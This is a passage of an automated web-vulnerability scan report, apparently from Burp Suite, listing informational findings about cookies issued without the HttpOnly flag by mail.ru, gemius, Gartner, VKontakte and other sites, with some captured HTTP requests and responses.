Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12962356.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=BPIGAGGvrgAA; expires=Wed, 24-Apr-13 14:21:29 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.135. http://r2.mail.ru/b12963308.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12963308.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=k+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.136. http://r2.mail.ru/b12965362.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12965362.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=cuoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.137. http://r2.mail.ru/b12968616.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12968616.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=+dsGAErbVQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.138. http://r2.mail.ru/b12979027.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12979027.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=y6YGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.139. http://r2.mail.ru/b13039712.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13039712.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=9doGAErbVQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.140. http://r2.mail.ru/b13044176.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13044176.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=JAEHAEmt3gAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.141. http://r2.mail.ru/b13049054.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13049054.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=CeQGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.142. http://r2.mail.ru/b13050852.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13050852.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=ZvYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.143. http://r2.mail.ru/b13057590.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13057590.swf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=1vsGAEvDVAAA; expires=Wed, 24-Apr-13 14:29:52 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.144. http://r2.mail.ru/b13058787.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13058787.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=9okGAHCbTwAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.145. http://r2.mail.ru/b13058840.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13058840.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=G+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.146. http://r2.mail.ru/b13058851.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13058851.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=r+cGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.147. http://r2.mail.ru/b13058852.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13058852.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=FPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.148. http://r2.mail.ru/b13058968.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13058968.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=29QGAEyt3gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.149. http://r2.mail.ru/b13059223.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13059223.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=RtAGAEqpQQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.150. http://r2.mail.ru/b13059860.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13059860.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=EegGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.151. http://r2.mail.ru/b13060405.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13060405.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=We8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:24 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.152. http://r2.mail.ru/b13060487.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13060487.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=Te8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.153. http://r2.mail.ru/b13061099.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13061099.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=k+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.154. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rbcgaru.hit.gemius.pl
Path:	/_1303741244306/rexdot.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Gtestss=Fsn.sfn.IWGSprvHhyLhdPi7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Gdyn=KlQbwQoGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKvMaejey8CDBPMx8REGT7r5vpXJc90jGFyFxGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.155. http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rbcgaru.hit.gemius.pl
Path:	/_1303741312919/rexdot.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Gtestss=jWsrZem9.5JcOYXoINPbKvT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Gdyn=KlxStQsGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKBDGXjey8CDBPMGGQaQGiag6Kq1W98ASFsjZxnaUMG..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.156. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

segments_p1="eJzjYuE42M3IxcLR9J8JSDYDSWaOozlAZmcHM5A8dAQkMN0YAMDqCYQ="; Domain=invitemedia.com; expires=Tue, 24-Apr-2012 14:40:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.157. http://shopping.netsuite.com/s.nl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.158. http://show.multiclick.ru/blank.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://show.multiclick.ru
Path:	/blank.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mtclk=7972985092388468962; Expires=Sat, 22-Oct-2011 14:52:42 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blank.php?place=2949&rnd=0.23312585408403952 HTTP/1.1
Host: show.multiclick.ru
Proxy-Connection: keep-alive
Referer: http://pda.loveplanet.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 25 Apr 2011 14:52:42 GMT
Content-Type: image/gif
Connection: close
Set-Cookie: mtclk=7972985092388468962; Expires=Sat, 22-Oct-2011 14:52:42 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 49

GIF89a...................!.......,........@..T..;

16.159. http://stats.kroogy.com/cnt-gif1x1.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stats.kroogy.com
Path:	/cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cnsuser_id=3793874385; expires=Wed, 25-Apr-2012 23:59:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt-gif1x1.php?e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home HTTP/1.1
Host: stats.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cnscc=1303647928; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303653223.1303658380.5; cnsuser_id=3793874385

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:38:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: cnsuser_id=3793874385; expires=Wed, 25-Apr-2012 23:59:59 GMT; path=/
Pragma: no-cache
Cache-control: no-cache
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

16.160. http://storage.trafic.ro/js/trafic.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://storage.trafic.ro
Path:	/js/trafic.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

trafic_ranking=6c7f4ecfdd8l1dc980fda3f00c3621d0; expires=Sun, 11-Jan-2037 14:00:00 GMT; path=/; domain=.trafic.ro

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.161. http://t2.trackalyzer.com/trackalyze.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t2.trackalyzer.com
Path:	/trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

loop=http%3A%2F%2Fwww%2Ecriticalwatch%2Ecom%2Fvulnerability%2Dmanagement%2Easpx; expires=Tue, 26-Apr-2011 07:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.criticalwatch.com/vulnerability-management.aspx&i=12408 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
Cache-Control: max-age=0
If-Modified-Since: Thu, 09 Nov 2006 20:55:11 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
If-None-Match: "6e791f59414c71:40e"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538; loop=http%3A%2F%2Fwww%2Ecriticalwatch%2Ecom%2Fvulnerability%2Dmanagement%2Easpx; ASPSESSIONIDSATDRRCT=HPHILLICKDBELBOMJPJGMDEB

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 12:52:31 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Ecriticalwatch%2Ecom%2Fvulnerability%2Dmanagement%2Easpx; expires=Tue, 26-Apr-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>

16.162. http://top5.mail.ru/counter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://top5.mail.ru
Path:	/counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VID=2VWb1Y31X_ms; path=/; expires=Tue, 26 Jul 2011 14:48:03 GMT; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.163. http://translate.googleapis.com/translate_a/t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.googleapis.com
Path:	/translate_a/t

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=5273502baf452368:TM=1303742935:LM=1303742935:S=EXx_U-Oas8EoHHIY; expires=Wed, 24-Apr-2013 14:48:55 GMT; path=/; domain=translate.googleapis.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
Origin: http://webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 4036

q=%3Ca%20i%3D0%3E%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%3C%2Fa%3E%3Ca%20i%3D1%3E%D0%9D%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8%3C%2Fa%3E%3Ca%20i%3D2%3E%D0%90%D0%B2%D1%82%D0%BE%3C%2Fa%3E%3Ca%20i%3D3%3E%D0%9A%D0%B8
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:48:55 GMT
Expires: Mon, 25 Apr 2011 14:48:55 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=5273502baf452368:TM=1303742935:LM=1303742935:S=EXx_U-Oas8EoHHIY; expires=Wed, 24-Apr-2013 14:48:55 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1713

["\x3ca i=0\x3eSearch\x3c/a\x3e \x3ca i=1\x3eNews\x3c/a\x3e \x3ca i=2\x3eAuto\x3c/a\x3e \x3ca i=3\x3eMovies\x3c/a\x3e \x3ca i=4\x3eWeather\x3c/a\x3e \x3ca i=5\x3eGames\x3c/a\x3e","My Page","All Ads","
...[SNIP]...

16.164. http://vkontakte.ru/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vkontakte.ru
Path:	/login.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

remixmid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
remixsid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
remixgid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
remixemail=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
remixpass=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php?act=slogin&al_frame=1&auto=1 HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: remixchk=5

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:24:44 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-control: no-store
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: remixmid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixsid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixgid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixemail=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixpass=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Vary: Accept-Encoding
Content-Length: 540

<script type="text/javascript">
var _ua = navigator.userAgent;
var locDomain = 'vkontakte.ru'.match(/[a-zA-Z]+\.[a-zA-Z]+\.?$/)[0];
if (/opera/i.test(_ua) || !/msie 6/i.test(_ua) || document.domain !=
...[SNIP]...

16.165. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wtssdc.gartner.com
Path:	/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xNzIyMzI3OTY4LjMwMTQ3MzkyAAAAAAABAAAAAQAAAMhktU1qYrVNAQAAAAEAAADIZLVNamK1TQEAAAABAAAAIzE3My4xOTMuMjE0LjI0My0xNzIyMzI3OTY4LjMwMTQ3Mzky; path=/; expires=Thu, 22-Apr-2021 12:10:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif?&dcsdat=1303733460071&dcssip=www.gartner.com&dcsuri=/DisplayDocument&dcsqry=%3Fdoc_cd=127481&WT.seg_2=000000-00&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Improve%20IT%20Security%20With%20Vulnerability%20Management&WT.js=Yes&WT.jv=1.5&WT.bs=1034x978&WT.fi=Yes&WT.fv=10.2&WT.cg_n=Document%20Display&WT.pn_sku=480703&WT.vt_f_tlh=1303732853&WT.vt_sid=173.193.214.243-1722167968.30147392.1303732853510&WT.co_f=173.193.214.243-1722167968.30147392&WTclass=FullFree&WTdoc_cd-title=127481:Improve%20IT%20Security%20With%20Vulnerability%20Management&WTdocrole=IT%20Infrastructure%20%26%20Operations;%20Security%20%26%20Risk%20Management;%20Enterprise%20Architecture;%20Application%20Management HTTP/1.1
Host: wtssdc.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WEBTRENDS_ID=173.193.214.243-1722327968.30147392; WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xNzIyMzI3OTY4LjMwMTQ3MzkyAAAAAAABAAAAAQAAAGpitU1qYrVNAQAAAAEAAABqYrVNamK1TQAAAAA-; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733460073:ss=1303732853510

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
Accept-Ranges: bytes
ETag: "09d6037a44c61:b1d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xNzIyMzI3OTY4LjMwMTQ3MzkyAAAAAAABAAAAAQAAAMhktU1qYrVNAQAAAAEAAADIZLVNamK1TQEAAAABAAAAIzE3My4xOTMuMjE0LjI0My0xNzIyMzI3OTY4LjMwMTQ3Mzky; path=/; expires=Thu, 22-Apr-2021 12:10:48 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Mon, 25 Apr 2011 12:10:48 GMT
Connection: close

GIF89a.............!.......,...........D..;

16.166. http://www.eset.com/us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tnt=deleted; expires=Sun, 25-Apr-2010 15:16:46 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://shopping.netsuite.com/s.nl?sc=3&c=438708&n=1&ext=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952755|check#true#1303743215|session#1303743154006-383984#1303745015; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.1.10.1303743158; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_visit%3D1%7C1303744959492%3B%20gpv_pageName%3Dus/new_homepage%7C1303744959494%3B%20s_nr%3D1303743159496-Repeat%7C1335279159496%3B%20s_invisit%3Dtrue%7C1303744959497%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

16.167. https://www.fusionvm.com/FusionVM/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fusionvm.com
Path:	/FusionVM/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CriticalWatch_WinMgmt=a623626d-8fc7-42a5-b103-e9b75ad79594; expires=Mon, 25-Apr-2011 13:19:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.168. http://www.gartner.com/0_admin/css/documentdisplay.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/0_admin/css/documentdisplay.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=f05c972c9edfede56a32664676fbba226bee90621e4ceb474db564e2; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/css/documentdisplay.css;pvc271f234619de471 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
